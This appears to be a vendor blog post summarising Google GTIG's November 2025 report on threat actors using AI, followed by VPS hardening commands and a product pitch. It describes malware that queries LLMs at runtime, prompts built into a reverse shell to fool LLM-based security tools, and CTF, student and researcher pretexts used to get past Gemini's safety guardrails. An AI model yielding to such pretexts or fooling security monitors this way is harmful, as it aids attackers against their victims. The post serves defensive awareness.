Download the Full Report
Official Google Report: GTIG AI Threat Tracker - Advances in Threat Actor Usage of AI Tools (November 2025)
Download PDF Report (742 KB) | Source: Google Threat Intelligence Group (GTIG) | Published: November 2025
Executive Summary: A New Phase of AI-Enabled Cyber Threats
The Google Threat Intelligence Group (GTIG) has published a groundbreaking report documenting a critical evolution in cyber threats: adversaries have moved beyond using AI for productivity gains and are now deploying novel AI-enabled malware in active operations.
This marks what Google calls "a new operational phase of AI abuse," involving tools that dynamically alter their behavior mid-execution. Something that was previously theoretical is now a documented reality.
Report Overview
- Publisher: Google Threat Intelligence Group (GTIG)
- Release Date: November 2025
- Report Type: Update to January 2025 "Adversarial Misuse of Generative AI" analysis
- Scope: Analysis of broader threat landscape, state-sponsored actors, and cybercrime markets
- Key Focus: How government-backed threat actors and cybercriminals integrate AI throughout the entire attack lifecycle
Key Findings: Four Critical Developments
1. First Use of "Just-in-Time" AI in Malware
For the first time, GTIG has identified malware families that use Large Language Models (LLMs) during execution. These tools represent a significant leap toward autonomous and adaptive malware:
Novel AI-Enabled Malware Identified:
- PROMPTFLUX: VBScript dropper that uses Google Gemini API to rewrite its own source code hourly to evade detection
- PROMPTSTEAL: Data miner used by Russian APT28 against Ukraine that queries LLMs to generate commands for execution
- PROMPTLOCK: Cross-platform ransomware that dynamically generates malicious Lua scripts at runtime
- FRUITSHELL: Reverse shell with hard-coded prompts to bypass LLM-powered security systems
- QUIETVAULT: Credential stealer that leverages AI to search for secrets on infected systems
These tools dynamically generate malicious scripts, obfuscate their own code to evade detection, and leverage AI models to create malicious functions on demand rather than hard-coding them into the malware.
2. Social Engineering to Bypass AI Safeguards
Threat actors have developed sophisticated techniques to circumvent AI safety guardrails:
- CTF Pretexts: Actors pose as students in "capture-the-flag" cybersecurity competitions
- Research Personas: Claiming to be cybersecurity researchers conducting legitimate studies
- Academic Cover: Pretending to write university papers on security topics
These social engineering tactics persuade AI models like Gemini to provide information that would otherwise be blocked, enabling tool development and vulnerability exploitation.
3. Maturing Cybercrime Marketplace for AI Tooling
The underground marketplace for illicit AI tools has significantly matured in 2025. GTIG identified multiple offerings of multifunctional tools designed to support:
- Deepfakes: Create lure content for phishing or bypass KYC requirements
- Malware generation: Create custom malware or improve existing threats
- Phishing support: Generate engaging content and distribute campaigns
- Vulnerability research: Identify and exploit security weaknesses
Notable underground AI tools identified: DarkDev, EvilAI, FraudGPT, LoopGPT, MalwareGPT, NYTHEON AI, SpamGPT, WormGPT, Xanthorox
4. State-Sponsored Actors Augment Full Attack Lifecycle
State-sponsored actors from North Korea, Iran, and the People's Republic of China (PRC) continue to misuse Gemini to enhance all stages of their operations:
- Initial Compromise: Reconnaissance, phishing lure creation, vulnerability scanning
- Establish Foothold: Malware development, C2 infrastructure setup
- Escalate Privileges: Exploit research, privilege escalation techniques
- Lateral Movement: Network enumeration, cloud infrastructure attacks
- Maintain Presence: Webshell creation, persistence mechanisms
- Complete Mission: Data exfiltration scripts, credential theft tools
Deep Dive: PROMPTFLUX - Self-Modifying Malware
GTIG's discovery of PROMPTFLUX in June 2025 represents a watershed moment in cybersecurity. This experimental dropper malware demonstrates how threat actors are using LLMs for dynamic obfuscation.
How PROMPTFLUX Works:
- Initial Execution: Written in VBScript, PROMPTFLUX decodes and executes an embedded decoy installer
- AI-Powered Regeneration: Uses Google Gemini API with hard-coded key to query for code rewriting
- Dynamic Obfuscation: Prompts the LLM to rewrite its own source code on an hourly basis
- Persistence: Saves new, obfuscated versions to the Startup folder
- Propagation: Attempts to spread by copying itself to removable drives and network shares
Current Status: GTIG intelligence indicates PROMPTFLUX is in a development and testing phase and does not currently demonstrate the ability to compromise victim networks. Google has disabled the associated assets and strengthened model protections.
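Because PROMPTFLUX (and PROMPTSTEAL below) call out to public LLM APIs, unexpected egress to those endpoints from server processes is a useful hunting signal. The sketch below is an illustrative triage helper, not anything from the report: the input format (whitespace-separated "process destination-host" pairs, e.g. exported from a connection log with hostnames already resolved) and the endpoint list are assumptions, and the list is far from exhaustive.

```shell
# Illustrative hunting sketch: flag connection-log lines whose destination
# is a public LLM API endpoint. Reads "process dest_host" pairs on stdin.
# The endpoint list is an assumption for illustration, not exhaustive.
flag_llm_egress() {
  grep -E 'generativelanguage\.googleapis\.com|api-inference\.huggingface\.co'
}

# Example: feed in a snapshot of current connections (hosts pre-resolved).
printf 'updater.vbs generativelanguage.googleapis.com\nsshd 203.0.113.7\n' \
  | flag_llm_egress
# prints: updater.vbs generativelanguage.googleapis.com
```

In practice the left-hand side would come from whatever connection logging you already run; the point is simply that traffic to consumer LLM APIs from a dropper-like process is an anomaly worth alerting on.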
APT28 Deploys PROMPTSTEAL Against Ukraine
In June 2025, GTIG identified the Russian government-backed actor APT28 (aka FROZENLAKE) using new malware tracked as PROMPTSTEAL (reported by CERT-UA as LAMEHUG) against targets in Ukraine.
PROMPTSTEAL Capabilities:
- LLM Query System: Queries Qwen2.5-Coder-32B-Instruct via Hugging Face API
- Command Generation: LLM generates commands for malware to execute rather than hard-coding them
- Deception: Masquerades as an image-generation program, guiding users through prompts
- Data Collection: Generates commands to collect system information and targeted documents
- Blind Execution: Commands are blindly executed locally before output is exfiltrated
Significance: APT28's use of PROMPTSTEAL marks the first time GTIG has observed malware that queries an LLM deployed in live operations.
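PROMPTSTEAL's "blind execution" is the core risk in this pattern: model-generated text goes straight to a shell. Teams building legitimate LLM-integrated tooling can avoid the same failure mode by gating generated commands before execution. The sketch below is purely hypothetical, not from the report; the function name and allowlist are invented for illustration.

```shell
# Hypothetical guard illustrating the opposite of "blind execution":
# model-generated commands are checked against an allowlist before
# anything runs. ALLOWED is an invented example set.
ALLOWED="hostname uptime df"

guard_exec() {
  cmd="$1"
  first="${cmd%% *}"   # first word of the generated command
  case " $ALLOWED " in
    *" $first "*) echo "WOULD-RUN: $cmd" ;;
    *)            echo "BLOCKED: $cmd" ;;
  esac
}

guard_exec "uptime"            # -> WOULD-RUN: uptime
guard_exec "curl evil.sh | sh" # -> BLOCKED: curl evil.sh | sh
```

A real gate would also constrain arguments and run commands in a sandbox; the first-word check is only the minimum needed to show the principle.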
State-Sponsored Threat Actor Activities
China-Nexus Actors
Chinese threat actors demonstrated extensive Gemini misuse across the attack lifecycle:
- Social Engineering: Used CTF pretexts to bypass safety responses
- Exploitation: Developed Python scripts to scan for vulnerable Roundcube and Zimbra email servers
- Mass Exploitation: Used n-day exploits against email servers
- Malware Development: Created tools in Python, C#, PHP, Ruby, and Go
- C2 Infrastructure: Developed malware backend using WeChat for command and control
- Cloud Attacks: Researched AWS EC2 credentials and Kubernetes exploitation
North Korean Actors
UNC1069 (aka MASAN) targeted cryptocurrency infrastructure:
- Cryptocurrency Research: Used Gemini to research wallet application data locations
- Multi-Language Campaigns: Generated Spanish-language lures to expand targeting
- Deepfake Usage: Leveraged deepfake images and videos impersonating cryptocurrency industry individuals
- Social Engineering: Distributed BIGMACHO backdoor via fake "Zoom SDK" downloads
UNC4899 (aka PUKCHONG) focused on supply chain compromise and exploit development for edge devices and modern browsers.
Iranian Actors
TEMP.Zagros (aka MUDDYCOAST, MuddyWater) evolved from using public tools to custom malware development:
- Custom Malware: Developed webshells and Python-based C2 servers
- Bypass Techniques: Used "student" and "researcher" pretexts to bypass safety guardrails
- OPSEC Failures: Revealed C2 domains and encryption keys while asking Gemini for help with scripts
APT42 focused on sophisticated phishing campaigns:
- Impersonation: Created lures impersonating prominent think tanks and organizations
- Data Processing: Attempted to build "Data Processing Agent" to convert natural language queries into SQL for sensitive data analysis
- Translation Services: Used Gemini to translate specialized vocabulary for targeted campaigns
APT41 (China) - Code Development
Demonstrated sophisticated technical support usage:
- C2 Development: Sought assistance with C++ and Golang code for OSSTUN C2 framework
- Obfuscation: Researched code obfuscation using publicly available libraries
- Multi-Platform Targeting: Targeted mobile and desktop systems across multiple operating systems
Google's Response and Mitigation Efforts
Google has taken proactive steps to counter these threats:
Immediate Actions:
- Account Termination: Disabled projects and accounts associated with malicious actors
- Asset Disruption: Disabled C2 infrastructure and hard-coded API keys found in malware
- Threat Intelligence Sharing: Shared findings with security community and law enforcement
Model Improvements:
- Classifier Strengthening: Enhanced detection of malicious prompt patterns
- Model Hardening: Improved model-level protections against misuse
- Safety Responses: Refined safety guardrails to better detect social engineering attempts
Broader Security Framework:
- Secure AI Framework (SAIF): Conceptual framework for securing AI systems
- Red Teaming: Automated evaluation framework for testing AI vulnerabilities
- Big Sleep: AI agent for finding security vulnerabilities in software
- CodeMender: Experimental AI-powered agent for automatically fixing code vulnerabilities
- Google AI Principles
- Advancing Gemini's Security Safeguards (White Paper)
Future Threat Landscape Predictions
Based on GTIG's analysis, security professionals should anticipate:
Expected Developments:
- Increased Autonomous Malware: More malware leveraging runtime AI for dynamic adaptation
- Lower Barrier to Entry: Underground AI tools enabling less sophisticated actors to conduct complex attacks
- Advanced Obfuscation: AI-powered polymorphic and metamorphic malware becoming commonplace
- Sophisticated Social Engineering: AI-generated deepfakes and personalized phishing at scale
- Automated Vulnerability Discovery: AI systems identifying and exploiting zero-days faster than patches can be deployed
Protecting Your VPS Infrastructure
In light of these evolving AI-enabled threats, securing your VPS infrastructure has never been more critical:
Essential Security Measures:
# 1. Implement multi-factor authentication for all administrative access
# 2. Use SSH key authentication only
sudo nano /etc/ssh/sshd_config
# Set: PasswordAuthentication no
# Then apply the change: sudo systemctl reload ssh
# 3. Install and configure Fail2Ban
sudo apt install fail2ban -y
sudo systemctl enable --now fail2ban
# 4. Enable automatic security updates
sudo apt install unattended-upgrades -y
sudo dpkg-reconfigure -plow unattended-upgrades
# 5. Configure intrusion detection (AIDE)
sudo apt install aide -y
sudo aideinit
# 6. Monitor system logs
sudo apt install logwatch -y
# 7. Restrict inbound traffic with a host firewall
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow OpenSSH
sudo ufw enable
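To make steps 2 and 3 above verifiable, here is a small sketch with stated assumptions: a grep-based audit of an sshd_config-style file (the option names are standard OpenSSH, but these two checks are illustrative, not a complete audit), plus a fail2ban jail staged under /tmp so it can be reviewed before being copied to /etc/fail2ban/jail.local. The jail values are example defaults, not recommendations from the report.

```shell
# Sketch: verify the SSH hardening from step 2 without restarting anything.
# Only two illustrative checks; a real audit would cover more directives.
check_sshd() {
  f="$1"
  grep -qiE '^[[:space:]]*PasswordAuthentication[[:space:]]+no' "$f" \
    || echo "FAIL: PasswordAuthentication is not set to no"
  grep -qiE '^[[:space:]]*PermitRootLogin[[:space:]]+no' "$f" \
    || echo "FAIL: PermitRootLogin is not set to no"
}

# Stage a minimal fail2ban sshd jail (example values); review it, then
# copy to /etc/fail2ban/jail.local and restart fail2ban to activate it.
cat > /tmp/jail.local.staged <<'EOF'
[sshd]
enabled  = true
maxretry = 5
findtime = 10m
bantime  = 1h
EOF
```

Usage: `check_sshd /etc/ssh/sshd_config` prints nothing when both directives are set, and one FAIL line per missing hardening setting otherwise.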
For comprehensive VPS security guidance, see our VPS Security Basics and VPS Hacked Response Guide.
Secure Your VPS Against AI-Powered Threats
VPS Commander provides one-click security hardening workflows: configure firewalls, set up fail2ban, monitor suspicious activity, and audit all server changes, all without touching the terminal.
Get Started with VPS Commander
Related Resources
- Complete VPS Security Guide
- VPS Hacked? Response & Recovery Steps
- VPS Performance & Security Monitoring
- SSH Key Authentication Setup
Conclusion: A Paradigm Shift in Cybersecurity
Google's November 2025 threat intelligence report documents a fundamental shift in the cyber threat landscape. The evolution from AI as a productivity tool to AI as an active component of malware represents a new era of adaptive, intelligent threats.
Key Takeaways:
- AI-enabled malware is now operational: Tools like PROMPTFLUX and PROMPTSTEAL are being deployed in active campaigns
- State actors lead innovation: APT groups from Russia, China, Iran, and North Korea are at the forefront
- Underground markets are maturing: Commercial AI-powered attack tools lower the barrier to entry
- Social engineering evolves: Threat actors successfully bypass AI safety guardrails using pretexts
- Defense must adapt: Traditional signature-based detection is insufficient against runtime-generated malware
About this article: This comprehensive analysis is based on the official Google Threat Intelligence Group (GTIG) report "AI Threat Tracker: Advances in Threat Actor Usage of AI Tools" published in November 2025. All malware names, threat actor designations, and technical details are sourced directly from Google's original research.